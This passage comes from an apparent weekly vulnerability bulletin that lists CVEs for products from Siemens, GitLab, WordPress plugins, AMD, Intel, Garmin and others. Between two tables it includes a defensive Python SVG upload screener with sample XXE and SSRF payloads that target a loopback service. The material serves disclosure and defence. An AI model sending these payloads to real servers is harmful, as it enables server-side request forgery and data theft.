7SJ85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SJ86 (CP200) (All versions), SIPROTEC 5 7SJ86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SK82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SK82 (CP150) (All versions < V11.0), SIPROTEC 5 7SK85 (CP200) (All versions), SIPROTEC 5 7SK85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SL82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SL82 (CP150) (All versions < V11.0), SIPROTEC 5 7SL86 (CP200) (All versions), SIPROTEC 5 7SL86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SL87 (CP200) (All versions), SIPROTEC 5 7SL87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SS85 (CP200) (All versions), SIPROTEC 5 7SS85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7ST85 (CP200) (All versions), SIPROTEC 5 7ST85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7ST86 (CP300) (All versions < V11.0), SIPROTEC 5 7SX82 (CP150) (All versions < V11.0), SIPROTEC 5 7SX85 (CP300) (All versions < V11.0), SIPROTEC 5 7SY82 (CP150) (All versions < V11.0), SIPROTEC 5 7UM85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT82 (CP100) (All versions >= V7.80), SIPROTEC 5 7UT82 (CP150) (All versions < V11.0), SIPROTEC 5 7UT85 (CP200) (All versions), SIPROTEC 5 7UT85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT86 (CP200) (All versions), SIPROTEC 5 7UT86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT87 (CP200) (All versions), SIPROTEC 5 7UT87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VE85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VK87 (CP200) (All versions), SIPROTEC 5 7VK87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VU85 (CP300) (All versions < V11.0), SIPROTEC 5 Compact 7SX800 (CP050) (All versions < V11.0). Affected devices do not use sufficiently random values to create session identifiers. This could allow an unauthenticated remote attacker to brute force a session identifier and gain read access to limited information from the web server without authorization. | 2026-05-12 | 5.3 | CVE-2024-54017 | https://cert-portal.siemens.com/productcert/html/ssa-786884.html |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to inject HTML and JavaScript into email notifications sent to other users due to improper input sanitization. | 2026-05-14 | 5.4 | CVE-2025-12669 | HackerOne Bug Bounty Report #3368096 https://gitlab.com/gitlab-org/gitlab/-/work_items/579385 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
| ghera74--ilGhera Support System for WooCommerce | The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ticket_content_callback' function in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to view any support ticket content, including sensitive customer information and private communications, by providing a ticket ID. | 2026-05-13 | 5.3 | CVE-2025-14033 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40ceea17-ec60-4775-8495-e2f7643d1b7c?source=cve https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L68 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L68 https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L643 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L643 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.3.1/includes/class-wc-support-system.php#L780 |
| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Price Manipulation and Insecure Direct Object Reference (IDOR) in all versions up to, and including, 4.0.1 only when used in combination with Cost Calculator Builder PRO. This is due to the ccb_woocommerce_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the renderWooCommercePayment() function passing user-controlled data directly to CCBWooCheckout::init() without authorization checks. This makes it possible for unauthenticated attackers to add WooCommerce products to their cart with attacker-controlled prices. | 2026-05-13 | 5.3 | CVE-2025-14755 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe684f43-8442-4b29-84a8-da8c6863e62b?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBOrderController.php#L484 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBAjaxAction.php#L99 |
| wpclever--WPC Badge Management for WooCommerce | The WPC Badge Management for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the `wpcbm_best_seller` shortcode in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-13 | 5.5 | CVE-2025-14767 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bf02edc9-2bb6-4ceb-b2a1-63f95c8becb3?source=cve https://wordpress.org/plugins/wpc-badge-management https://plugins.trac.wordpress.org/browser/wpc-badge-management/trunk/includes/class-shortcode.php#L98 https://plugins.trac.wordpress.org/changeset/3519100/ |
| Tp-link--TL-WR720NMbps Wireless N Router | TP-Link TL-WR720N wireless router contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized administrative actions by crafting malicious web requests. Attackers can modify port forwarding rules via VirtualServerRpm.htm or change WiFi security settings via WlanSecurityRpm.htm by tricking authenticated users into visiting attacker-controlled pages. | 2026-05-17 | 4.3 | CVE-2018-25321 | ExploitDB-44335 Official Product Homepage Product Reference VulnCheck Advisory: TP-Link TL-WR720N All Versions CSRF via Administrative Interfaces |
| Joomlaextensions--Joomla! extension JoomOCShop | Joomla JoomOCShop 1.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions on behalf of authenticated users. Attackers can craft malicious HTML forms targeting account endpoints such as /joomoc2/?route=account/edit to modify user information or reset passwords without the user's consent. | 2026-05-17 | 4.3 | CVE-2018-25337 | ExploitDB-44789 Official Product Homepage Product Reference VulnCheck Advisory: Joomla JoomOCShop 1.0 Cross-Site Request Forgery |
| Easy2pilot-v7--Easy2Pilot | Easy2Pilot 7 contains a cross-site request forgery vulnerability that allows attackers to add unauthorized user accounts by tricking authenticated administrators into visiting malicious pages. Attackers can craft HTML forms targeting the admin.php?action=add_user endpoint with POST requests containing username and password parameters to create new administrative accounts without explicit user consent. | 2026-05-13 | 4.3 | CVE-2020-37217 | ExploitDB-48099 Official Product Homepage VulnCheck Advisory: Easy2Pilot 7 Cross-Site Request Forgery via admin.php |
| CouchCMS--CouchCMS | CouchCMS 2.2.1 contains a server-side request forgery vulnerability that allows authenticated attackers to make arbitrary HTTP requests by uploading malicious SVG files. Attackers can upload SVG files containing external entity references through the browse.php endpoint to access internal services and resources. | 2026-05-15 | 4.3 | CVE-2021-47958 | ExploitDB-49675 Official Product Homepage VulnCheck Advisory: CouchCMS 2.2.1 Server-Side Request Forgery via SVG upload |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with Guest permissions to view issues in projects they were not authorized to access. | 2026-05-14 | 4.3 | CVE-2025-13874 | HackerOne Bug Bounty Report #3445398 https://gitlab.com/gitlab-org/gitlab/-/work_items/582634 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
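The CouchCMS row above (CVE-2021-47958) describes server-side request forgery through an uploaded SVG that carries external entity references. As an added example, not CouchCMS code, here is a pre-parse screen an upload handler could run on an SVG before storing or rendering it. It rejects DOCTYPE/ENTITY declarations and xml-stylesheet instructions on the raw bytes, before any XML parser is involved, then parses the document and refuses `href`/`xlink:href` values that point outside it (remote images, `<use>` of a remote document) as well as `<script>`/`<foreignObject>`. The sample SVGs are constructed for this example; the function name `screen_svg` and the accept/deny policy are this example's own choices, not CouchCMS's fix.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Anything that makes an XML parser or renderer reach for another resource:
# an internal/external DTD, an entity declaration, or a stylesheet PI.
# Checked on the raw text so the parser never gets a chance to resolve it.
_DECL_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b|<\?(xml-stylesheet)\b", re.IGNORECASE)
# Attributes through which SVG content can reference another resource.
_REF_ATTRS = ("href", f"{{{XLINK_NS}}}href")
# Elements that have no business in a user-uploaded badge or icon.
_FORBIDDEN_TAGS = {f"{{{SVG_NS}}}script", f"{{{SVG_NS}}}foreignObject"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def screen_svg(raw: bytes):
    """Return (accepted, reason) for an uploaded SVG (example policy)."""
    text = raw.decode("utf-8", errors="replace")
    m = _DECL_RE.search(text)
    if m:
        what = (m.group(1) or m.group(2)).upper()
        return False, f"{what} not allowed in uploaded SVG"
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    if root.tag != f"{{{SVG_NS}}}svg":
        return False, "root element is not <svg>"
    for el in root.iter():
        if el.tag in _FORBIDDEN_TAGS:
            return False, f"<{_local(el.tag)}> not allowed"
        for attr in _REF_ATTRS:
            val = el.get(attr)
            if val is None:
                continue
            v = val.strip().lower()
            # Fragment references stay inside the document and data: URIs carry
            # their payload inline; every other scheme (http, file, ftp, ...) is
            # a fetch the server or a viewer would perform on the uploader's behalf.
            if v.startswith("#") or v.startswith("data:"):
                continue
            return False, f"external reference in <{_local(el.tag)} {_local(attr)}>"
    return True, "ok"


# Constructed samples for this example.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/><use href="#a"/></svg>'
)
# XXE-style payload: an external entity aimed at a loopback service.
XXE_SVG = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE svg [<!ENTITY x SYSTEM "http://127.0.0.1:8080/">]>'
    b'<svg xmlns="http://www.w3.org/2000/svg"><text>&x;</text></svg>'
)
# No DTD at all, but an <image> that would make the renderer fetch a URL.
SSRF_IMAGE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    b'<image xlink:href="http://127.0.0.1:8080/" width="1" height="1"/></svg>'
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SVG), ("xxe", XXE_SVG), ("image", SSRF_IMAGE_SVG)):
        print(name, screen_svg(doc))
```

The raw-text check comes first on purpose: a DTD-resolving parser (lxml with the defaults, many image libraries) fetches the entity while parsing, so a check that runs on the parsed tree is already too late. Python's `xml.etree` does not fetch external entities, but the upload may later be handed to a converter that does, which is why the policy is enforced at ingestion.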
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| There were no low vulnerabilities recorded this week. | |||||
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AMD--AMD Ryzen 5000 Series Desktop Processors with Radeon Graphics | A compromised Trusted OS (TOS) driver could issue a malformed call that could potentially allow memory access outside the intended range resulting in loss of integrity. | 2026-05-15 | not yet calculated | CVE-2021-26380 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD--AMD Ryzen 3000 Series Mobile Processors with Radeon Graphics | A TOCTOU (Time-Of-Check to Time-Of-Use) in the graphics interface may allow an attacker to load registers repeatedly creating a race condition potentially leading to a loss of integrity. | 2026-05-15 | not yet calculated | CVE-2022-23826 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| KMX--Alien::FreeImage | Alien::FreeImage versions through 1.001 for Perl contains several vulnerable libraries. Alien::FreeImage contains version 3.17.0 of the FreeImage library from 2017, which has known vulnerabilities such as CVE-2015-0852 and CVE-2025-65803. The library embeds other image libraries that also have known vulnerabilities. | 2026-05-11 | not yet calculated | CVE-2022-4988 | https://freeimage.sourceforge.io/ https://metacpan.org/release/KMX/Alien-FreeImage-1.001/source/src/Source https://nvd.nist.gov/vuln/detail/CVE-2015-0852 https://nvd.nist.gov/vuln/detail/CVE-2025-65803 https://github.com/kmx/alien-freeimage/issues/4 https://github.com/kmx/alien-freeimage/issues/5 |
| n/a--MK-Auth 23.01K4.9 | An arbitrary file upload vulnerability in MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2026-05-12 | not yet calculated | CVE-2023-27753 | https://github.com/yueslly/MKAUTH-RCE/blob/main/README.md https://github.com/yueslly/MKAUTH-RCE |
| n/a--MK-Auth 23.01K4.9 | An insecure direct object reference in MK-Auth 23.01K4.9 allows attackers to access and send support calls for other users via manipulation of the chamado parameter through a crafted GET request. | 2026-05-12 | not yet calculated | CVE-2023-30059 | https://github.com/yueslly/MKAUTH-IDOR |
| AMD[.]com--AMD Radeon RX 6000 Series Graphics Products | Improper validation in Power Management Firmware (PMFW) may allow an attacker with privileges to pass malformed workload arguments when exporting table data from SMU to DRAM potentially resulting in a loss of confidentiality and/or availability. | 2026-05-15 | not yet calculated | CVE-2023-31309 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Ryzen 5000 Series Mobile Processors with Radeon Graphics | Improperly preserved integrity of hardware configuration state during a power save/restore operation in the AMD Secure Processor (ASP) could allow an attacker with the ability to write outside the trusted memory range (TMR) to change the execution flow of the Video Core Next (VCN) firmware potentially impacting confidentiality, integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2023-31316 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 6000 Series Graphics Products | Improper restriction of operations within the bounds of a memory buffer in the AMD Secure Processor (ASP) could allow an attacker to read or write to protected memory potentially resulting in arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2023-31317 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Instinct MI300X | An out of bounds read in the remote management firmware could allow a privileged attacker to read a limited section of memory outside of established bounds potentially resulting in loss of confidentiality or availability. | 2026-05-15 | not yet calculated | CVE-2024-21950 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD EPYC 4005 Series Processors | Improper Input Validation in the AMD RAID driver could allow an attacker to point to an arbitrary memory location potentially resulting in privilege escalation and arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-21962 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4016.html |
| AMD[.]com--AMD EPYC Series 9004 Processors | Improper enforcement of the LFENCE serialization property may allow an attacker to bypass speculation barriers and potentially disclose sensitive information, potentially resulting in loss of confidentiality. | 2026-05-13 | not yet calculated | CVE-2024-36315 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| AMD[.]com--AMD Radeon RX 7000 Series Graphics Products | Improper isolation of VCN-JPEG HW register space could allow a malicious Guest Virtual Machine (VM) or a process to perform unauthorized access to the register space of the JPEG cores assigned to a victim VM/process, potentially gaining arbitrary read/write access to the victim VM/process data. | 2026-05-15 | not yet calculated | CVE-2024-36323 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon PRO V710 | Improper isolation of GPU HW register space could allow a privileged attacker in malicious Guest Virtual Machine (VM) to perform unauthorized access to specific victim range of GPU MMIO register space, potentially causing the host OS to reboot and creating a Denial of Service (DOS) condition. | 2026-05-15 | not yet calculated | CVE-2024-36332 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 5000 Series Graphics Products | A DLL hijacking vulnerability in the AMD Cleanup Utility could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-36333 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 7000 Series Graphics Products | Improper verification of cryptographic signature in the Radeon RGB tool could allow a malicious file placed in the installation directory to be run with elevated privileges potentially leading to arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-36334 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD EPYC 4004 | Improper input validation in the AMD OverDrive (AOD) System Management Mode (SMM) module could allow a privileged attacker to perform an out-of-bounds read, potentially resulting in loss of confidentiality. | 2026-05-15 | not yet calculated | CVE-2024-36345 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| Checkmk GmbH--Checkmk | Privilege escalation in the mk_mysql agent plugin on Windows in Checkmk <2.4.0p29, <2.3.0p47, and 2.2.0 (EOL) allows a local unprivileged user able to create a Windows service whose name matches 'MySQL' or 'MariaDB' (or with write access to a binary referenced by such a service) to execute arbitrary code in the context of the Checkmk agent service, which typically runs as SYSTEM. | 2026-05-13 | not yet calculated | CVE-2024-47091 | https://checkmk.com/werk/19198 |
| n/a--Ardupilot | Buffer Overflow vulnerability in Ardupilot rover commit v.c56439b045162058df0ff136afea3081fcd06d38 allows a local attacker to cause a denial of service via the AP_InertialSensor_ADIS1647x.cpp, ArduRover, ADIS1647x Sensor component. | 2026-05-13 | not yet calculated | CVE-2024-48519 | https://github.com/ArduPilot/ardupilot/issues/27937 |
| n/a--Ardupilot | Buffer Overflow vulnerability in ArduPilot Copter, latest commit 92693e023793133e49a035daf37c14433e484778, allows a local attacker to cause a denial of service via the AP_MSP::loop, AP_MSP, AP_MSP.cpp components. | 2026-05-13 | not yet calculated | CVE-2024-51394 | https://github.com/ArduPilot/ardupilot/issues/28458 |
| n/a--Ardupilot | Buffer Overflow vulnerability in ArduPilot Copter, latest commit 92693e023793133e49a035daf37c14433e484778, allows a local attacker to cause a denial of service via the AP_SmartAudio::loop, AP_SmartAudio, AP_SmartAudio.cpp components. | 2026-05-13 | not yet calculated | CVE-2024-51395 | https://github.com/ArduPilot/ardupilot/issues/28374 |
| n/a--FMT-Firmware | Firmament-Autopilot FMT-Firmware commit de5aec was discovered to contain a buffer overflow via the task_mavobc_entry function at /comm/task_comm.c. | 2026-05-13 | not yet calculated | CVE-2024-55045 | https://github.com/Firmament-Autopilot/FMT-Firmware/issues/133 |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An unchecked return value within the AMD Platform Management Framework (PMF) could allow an attacker to read or modify an arbitrary address potentially resulting in loss of confidentiality, integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2025-0028 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7040 Series Mobile Processors with Radeon Graphics | Improper access control between the Joint Test Action Group (JTAG) and Advanced Extensible Interface (AXI) could allow an attacker with physical access to read or overwrite the contents of cross-chip debug (XCD) registers potentially resulting in loss of data integrity or confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-0040 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Ryzen AI Max+ | An out-of-bounds read in power management firmware by a malicious local attacker with low privileges could potentially lead to a partial loss of confidentiality and availability. | 2026-05-15 | not yet calculated | CVE-2025-0044 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--Athlon 3000 Series Mobile Processors with Radeon Graphics | Improper input validation in the AMD Secure Processor (ASP) PCI driver may allow a local attacker to create a buffer overflow condition, potentially resulting in a crash or denial of service. | 2026-05-15 | not yet calculated | CVE-2025-0045 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3047.html |
| WSO2--WSO2 Identity Server | Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked. This vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts. | 2026-05-11 | not yet calculated | CVE-2025-10908 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/ |
| Siemens--Simcenter Femap | The affected applications contain a memory corruption vulnerability while parsing specially crafted IPT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27349, ZDI-CAN-27389) | 2026-05-12 | not yet calculated | CVE-2025-12659 | https://cert-portal.siemens.com/productcert/html/ssa-870926.html |
| silabs.com--Simplicity SDK | * Countermeasures for DPA within SYMCRYPTO engine on SixG301xxx devices are not sufficiently random and will eventually repeat. * KSU keys using SYMCRYPTO will be impacted by this vulnerability. | 2026-05-15 | not yet calculated | CVE-2025-14972 | https://community.silabs.com/068Vm00000M3cAX |
| n/a--Intel(R) Ethernet 800 series | Use after free for some Linux kernel driver for the Intel(R) Ethernet 800 series before version 2.3.14 within Ring 0: Kernel may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts. | 2026-05-12 | not yet calculated | CVE-2025-27723 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01426.html |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack. If a malicious graphics package containing symlinks is uploaded, the web server follows the supplied links when serving content. No mechanism to restrict those link targets to a specific area of the filesystem is enabled. This allows an attacker to retrieve arbitrary files from the device. | 2026-05-13 | not yet calculated | CVE-2025-27850 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a cross-site origin WebSocket hijacking attack. Among other uses, the WDU utilizes WebSockets to control settings, including administrative settings. This allows a network attacker to take full control of a WDU. To initiate an exploit of this vulnerability, the victim must (1) be utilizing a web browser on a multihomed host that has local interfaces on the Garmin Marine Network as well as another network, and (2) access a malicious third party website created by the attacker. | 2026-05-13 | not yet calculated | CVE-2025-27851 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page. | 2026-05-13 | not yet calculated | CVE-2025-27852 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed. The WDU web site only performs authentication with the client within the client's browser. The WebSockets used to communicate with the WDU server do not enforce any authentication. An attacker may bypass all authentication mechanisms by directly utilizing the remote APIs available on the websocket. | 2026-05-13 | not yet calculated | CVE-2025-27853 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| ThreadReadButtons--ThreadReadButtons | striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function ThreadReadButtons. | 2026-05-13 | not yet calculated | CVE-2025-28343 | https://github.com/striso/striso-control-firmware/issues/5 |
| AuxJack--AuxJack | striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function AuxJack. | 2026-05-13 | not yet calculated | CVE-2025-28344 | https://github.com/striso/striso-control-firmware/issues/6 |
| NXP[.]com--NXP | NXP moal.ko Wi-Fi driver 5.1.7.10, FW versions v17.92.1.p149.43 to v17.92.1.p149.157, was discovered to contain a buffer overflow via the mod_para parameter in the woal_init_module_param function. | 2026-05-13 | not yet calculated | CVE-2025-29338 | https://www.nxp.com/docs/en/release-note/RN00104.pdf https://github.com/masjadaan/CVE-2025-29338 |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An out of bounds write within the AMD Platform Management Framework (PMF) could allow an attacker to execute arbitrary code at an elevated privilege level potentially leading to loss of confidentiality, integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2025-29935 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | Improper input validation within the AMD Platform Management Framework (PMF) could allow an attacker to unmap arbitrary memory pages potentially impacting integrity and availability, or allowing privilege escalation resulting in loss of confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-29936 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An out of bounds read within the AMD Platform Management Framework (PMF) could allow an attacker to trigger a read of an arbitrary memory location potentially resulting in loss of availability or confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-29937 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An unchecked return value within the AMD Platform Management Framework (PMF) could allow an attacker to write to an arbitrary memory address resulting in denial of service or arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2025-29938 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 4000 Series Mobile Processors with Radeon Graphics (formerly codenamed "Renoir") | A buffer overflow vulnerability within AMD Sensor Fusion Hub Driver can allow a local attacker to write out of bounds, potentially resulting in denial of service or crash. | 2026-05-15 | not yet calculated | CVE-2025-29944 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| Significant-Gravitas--AutoGPT | AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. In AutoGPT, the execution process is recorded to the console (stdout/stderr), and deployed in container mode, which is automatically captured by Docker and stored as "container logs". However, prior to 0.6.32, there is no limit on the log size when the container is deployed. When the number of user accesses is too large, the log on the server disk will be too large, causing disk resource exhaustion and eventually causing DoS. autogpt-platform-beta-v0.6.32 fixes the issue. | 2026-05-13 | not yet calculated | CVE-2025-32425 | https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-vw3v-whvp-33v5 https://github.com/Significant-Gravitas/AutoGPT/commit/57a06f70883ce6be18738c6ae8bb41085c71e266 https://github.com/Significant-Gravitas/AutoGPT/blob/62361ccc48327b3124549543b45d933d16f622d2/autogpt_platform/autogpt_libs/autogpt_libs/logging/config.py#L83-L102 https://github.com/Significant-Gravitas/AutoGPT/blob/62361ccc48327b3124549543b45d933d16f622d2/autogpt_platform/docker-compose.platform.yml#L102-L142 |
| Intel[.]com--Intel(R) Server Firmware Update Utility Software | Uncontrolled search path for some Intel(R) Server Firmware Update Utility Software before version 16.0.12. within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35969 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01410.html |
| Intel[.]com--Intel(R) Processors | Exposure of sensitive information caused by shared microarchitectural predictor state that influences transient execution for some Intel(R) Processors within VMX non-root (guest) operation may allow an information disclosure. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable data exposure. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35979 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01420.html |
| Intel[.]com--Intel Endpoint Management Assistant (EMA) software | Improper input validation for some Intel Endpoint Management Assistant (EMA) software before version 1.14.5 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35990 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01434.html |
